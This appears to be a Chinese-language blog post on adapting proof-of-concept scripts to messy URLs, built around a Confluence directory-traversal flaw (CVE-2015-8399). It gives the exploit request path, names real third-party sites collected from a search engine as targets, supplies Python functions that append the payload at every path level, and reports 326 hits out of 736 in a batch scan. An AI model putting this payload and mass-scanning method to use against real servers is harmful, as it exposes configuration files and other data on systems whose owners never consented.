解决PoC脚本对多种URL的自适应问题
[Python]
在批量POC的过程中,我们采集到的URL状态往往是不同的. 因此我们需要对URL进行统一处理,从而确保POC脚本能够准确的验证每个URL 我们以实际漏洞举例说明,并给出我的解决方案.
漏洞示例
Atlassian Confluence 5.8.17 之前版本中存在漏洞,该漏洞源于spaces/viewdefaultdecorator.action
和admin/viewdefaultdecorator.action
文件没有充分过滤'decoratorName'
参数。远程攻击者可利用该漏洞读取配置文件。
详情参考: http://zone.wooyun.org/content/27104 http://www.cnnvd.org.cn/vulnerability/show/cv_id/2016010311 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8399
该文件遍历漏洞利用很简单,只要访问这个位置,就可以列出当前目录文件: /spaces/viewdefaultdecorator.action?decoratorName=.
现在我们在搜索引擎采集到的URL有如下几种状态:
1 wiki.kuali.org
2 http://dev.aixuedai.com:8090/
3 https://wiki.netdef.org/display/osr/Home
4 http://cwiki.apache.org/confluence/display/Hive/HCatalog/?id=2#
现在我们考虑POC如何编写才能适应以上这些不同形式的URL
解决方案
前两种我们统一URL格式,使POC脚本能够正确打开即可.而第三第四种情况,我们采集到的URL有多层目录,甚至有POST参数,我们从哪一层开始添加payload做验证呢?
这里我采用的一种方式是:先整理格式,然后取出URL有用的部分组合成新的URL,再针对多成目录进行组合遍历.
操作过程
- 原始URL: http://cwiki.apache.org:8090/confluence/display/Hive/HCatalog/?id=2#
- 提取后的URL: protocol:
http
domain name:cwiki.apache.org
port:8090
path:/confluence/display/Hive/HCatalog/
params:id=2
fragments:#
- 将path分解 path_list = [‘confluence’, ‘display’, ‘Hive’, ‘HCatalog’]
- 去掉无用部分,枚举path字段,组合成新的URL poc_list = [ ‘http://cwiki.apache.org:8090‘, ‘http://cwiki.apache.org:8090/confluence‘, ‘http://cwiki.apache.org:8090/confluence/display‘, ‘http://cwiki.apache.org:8090/confluence/display/Hive‘, ‘http://cwiki.apache.org:8090/confluence/display/Hive/HCatalog’ ]
- 对4中的每个URL字符串结尾加上
/spaces/viewdefaultdecorator.action?decoratorName=.
做验证
批量实践
使用Python内建模块urlparse来格式化URL,我添加了以下两个函数来满足我们的需求.
def get_domain(url):
"""
added by cdxy May 8 Sun,2016
Use:
get_domain('http://cdxy.me:80/cdsa/cda/aaa.jsp?id=2#')
Return:
'http://cdxy.me:80'
"""
p = urlparse(url)
return urlunsplit([p.scheme, p.netloc, '', '', ''])
def iterate_path(ori_str):
"""
added by cdxy May 8 Sun,2016
Use:
iterate_path_to_list('http://cdxy.me:80/cdsa/cda/aaa.jsp?id=2#')
Return:
['http://cdxy.me:80/path1/path2/index.jsp?id=2#',
'http://cdxy.me:80/'
'http://cdxy.me:80/cdsa',
'http://cdxy.me:80/cdsa/cda',
'http://cdxy.me:80/cdsa/cda/aaa.jsp']
"""
parser = urlparse(ori_str)
_ans_list = [ori_str]
_ans_list.append(get_domain(ori_str))
_path_list = parser.path.replace('//', '/').strip('/').split('/')
s = ''
for each in _path_list:
s += '/' + each
_ans_list.append(urljoin(ori_str, s))
return _ans_list
此漏洞的POC脚本现已集成到我的并发框架,扫描结果326 / 736
命中率还是挺高的: